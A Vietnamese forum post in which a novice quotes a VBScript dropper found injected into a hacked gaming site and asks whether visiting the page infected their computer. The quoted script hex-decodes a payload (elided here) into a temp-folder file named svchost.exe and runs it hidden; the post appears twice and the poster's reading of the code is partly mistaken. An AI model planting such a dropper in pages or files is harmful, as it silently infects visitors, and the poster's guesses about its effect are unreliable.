yingwu
Member
-
10/08/2017
-
1
-
5 bài viết
[ VBScript ] Virus dropFileName = "svchost.exe"
Nghe tên tiêu đề em nghĩ chắc mấy cao thủ cũng biết con Virus này rồi nhỉ , hehe . Tại em cũng có đọc mấy bài viết trước từ con Virus này nhưng có từ những năm 2011-2013.
Hôm qua em lướt Web thấy một trang về thể loại Game hồi trước em hay chơi . Em vào thì thấy nó ghi 'Website đang bị gián đoạn do bị tấn công' . Em có view-source thì thấy bên cuối mã nguồn thì có dòng này
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "Trong đây là đoạn code đc mã hóa rất dài"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
Em cũng gà mờ trong việc lập trình , nên có thể hiểu sơ sơ đoạn Code ( có khi còn hiểu sai ) , em nghĩ nó xóa File svchost.exe trên máy của mình và tạo ra một đoạn script gì đó để khai thác và ẩn trong file svchost.exe trên máy em và các mã độc đó được đặt trong biến WriteData thì phải ... Em vào trang Web này liệu đoạn mã này có thực thi đến file svchost.exe trên máy em không mọi người , tại em vào xem svchost.exe trong system32 thì thấy dung lượng nó chỉ 27kb
Em cũng có đọc mấy bài viết về con Virus này nhưng mà họ không có nói về tác hại của nó và cũng không nói rõ nếu Client truy cập vào trang Web có đoạn mã này thì liệu máy họ có bị dính Virus hay không.
Em cảm ơn mọi người trước , em cũng mới vào diễn đàn và hoạt động . Hi vọng được mọi người giúp đỡ ! Nếu có gì sai xót thì xin mọi người bỏ qua ^^
Hôm qua em lướt Web thấy một trang về thể loại Game hồi trước em hay chơi . Em vào thì thấy nó ghi 'Website đang bị gián đoạn do bị tấn công' . Em có view-source thì thấy bên cuối mã nguồn thì có dòng này
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "Trong đây là đoạn code đc mã hóa rất dài"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
Em cũng gà mờ trong việc lập trình , nên có thể hiểu sơ sơ đoạn Code ( có khi còn hiểu sai ) , em nghĩ nó xóa File svchost.exe trên máy của mình và tạo ra một đoạn script gì đó để khai thác và ẩn trong file svchost.exe trên máy em và các mã độc đó được đặt trong biến WriteData thì phải ... Em vào trang Web này liệu đoạn mã này có thực thi đến file svchost.exe trên máy em không mọi người , tại em vào xem svchost.exe trong system32 thì thấy dung lượng nó chỉ 27kb
Em cũng có đọc mấy bài viết về con Virus này nhưng mà họ không có nói về tác hại của nó và cũng không nói rõ nếu Client truy cập vào trang Web có đoạn mã này thì liệu máy họ có bị dính Virus hay không.
Em cảm ơn mọi người trước , em cũng mới vào diễn đàn và hoạt động . Hi vọng được mọi người giúp đỡ ! Nếu có gì sai xót thì xin mọi người bỏ qua ^^
ropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName.